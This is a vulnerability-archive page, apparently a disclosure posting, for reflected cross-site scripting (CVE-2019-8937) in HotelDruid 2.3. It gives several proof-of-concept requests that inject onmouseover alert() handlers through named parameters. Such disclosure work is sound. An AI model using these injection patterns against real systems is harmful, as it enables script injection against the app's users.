HotelDruid 2.3 Cross Site Scripting

HotelDruid 2.3 Cross Site Scripting: Posted Feb 20, 2019; Authored by Mehmet Emiroglu; HotelDruid version 2.3 suffers from a cross site scripting vulnerability.; tags | exploit, xss; advisories | CVE-2019-8937; SHA-256 | b8b4d0033d177aa9bf8b3150356f740ab1f09145a7f00bc8aecfbdcff02f3a62; Download | Favorite | View

HotelDruid 2.3 Cross Site Scripting

===========================================================================================
# Exploit Title: Hoteldruid 2.3 - 'nsextt' XSS Injection
# CVE: CVE-2019-8937
# Date: 18-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/
# Software Link: https://sourceforge.net/projects/hoteldruid/
# Version: v2.3
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: HotelDruid is a property management system (PMS)
designed to make hotel and hostel rooms
  bed and breakfast apartments, or any other kind of daily rental easy to
manage from a web browser.
===========================================================================================
# POC - XSS
# Parameters : nsextt
# Attack Pattern : x%22+onmouseover%3dalert(0x000981)+x%3d%22
# GET Request : http://localhost/hoteldruid/visualizza_tabelle.php?nsextt=x"
onmouseover=alert(0x000981) x="
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Hoteldruid 2.3 - 'cambia1' XSS Injection
# CVE: CVE-2019-8937
# Date: 18-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/
# Software Link: https://sourceforge.net/projects/hoteldruid/
# Version: v2.3
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: HotelDruid is a property management system (PMS)
designed to make hotel and hostel rooms
  bed and breakfast apartments, or any other kind of daily rental easy to
manage from a web browser.
===========================================================================================
# POC - XSS
# Parameters : cambia1
# Attack Pattern : " onmouseover="alert(8562604)
# POST Request :
http://localhost/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671"
onmouseover="alert(8562604)
# https://i.hizliresim.com/6avvoE.jpg
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Hoteldruid 2.3 - 'mese_fine' XSS Injection
# CVE: CVE-2019-8937
# Date: 18-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/
# Software Link: https://sourceforge.net/projects/hoteldruid/
# Version: v2.3
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: HotelDruid is a property management system (PMS)
designed to make hotel and hostel rooms
  bed and breakfast apartments, or any other kind of daily rental easy to
manage from a web browser.
===========================================================================================
# POC - XSS
# Parameters : mese_fine
# Attack Pattern : " onmouseover="alert(6520859)
# POST Request :
http://localhost/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13"
onmouseover="alert(6520859)
# https://i.hizliresim.com/v6NAzD.jpg
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Hoteldruid 2.3 - 'origine' XSS Injection
# CVE: CVE-2019-8937
# Date: 18-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/
# Software Link: https://sourceforge.net/projects/hoteldruid/
# Version: v2.3
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: HotelDruid is a property management system (PMS)
designed to make hotel and hostel rooms
  bed and breakfast apartments, or any other kind of daily rental easy to
manage from a web browser.
===========================================================================================
# POC - XSS
# Parameters : origine
# Attack Pattern : " onmouseover="alert(8987004))
# POST Request :
http://localhost/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php"
onmouseover="alert(8987004)
# https://i.hizliresim.com/v6NAmO.jpg
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Hoteldruid 2.3 - 'anno' XSS Injection
# CVE: CVE-2019-8937
# Date: 18-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/
# Software Link: https://sourceforge.net/projects/hoteldruid/
# Version: v2.3
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: HotelDruid is a property management system (PMS)
designed to make hotel and hostel rooms
  bed and breakfast apartments, or any other kind of daily rental easy to
manage from a web browser.
===========================================================================================
# POC - XSS
# Parameters : anno
# Attack Pattern : " onmouseover="alert(1548690)
# POST Request :
http://localhost/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019"
onmouseover="alert(1548690)
# https://i.hizliresim.com/EmAW68.jpg
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Hoteldruid 2.3 - 'origine' XSS Injection
# CVE: CVE-2019-8937
# Date: 18-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/
# Software Link: https://sourceforge.net/projects/hoteldruid/
# Version: v2.3
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: HotelDruid is a property management system (PMS)
designed to make hotel and hostel rooms
  bed and breakfast apartments, or any other kind of daily rental easy to
manage from a web browser.
===========================================================================================
# POC - XSS
# Parameters : origine
# Attack Pattern : " onmouseover="alert(6332576)
# POST Request :
http://localhost/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php"
onmouseover="alert(6332576)
# https://i.hizliresim.com/EmAW68.jpg
===========================================================================================

Top Authors In Last 30 Days

Red Hat 217 files
indoushka 135 files
Ubuntu 92 files
Gentoo 33 files
Debian 27 files
Jasper Nota 25 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Google Security Research 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,110)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,913)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,631)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,781)
UNIX (9,441)
UnixWare (187)
Windows (6,676)
Other

HotelDruid 2.3 Cross Site Scripting

HotelDruid 2.3 Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

HotelDruid 2.3 Cross Site Scripting

Share This

HotelDruid 2.3 Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems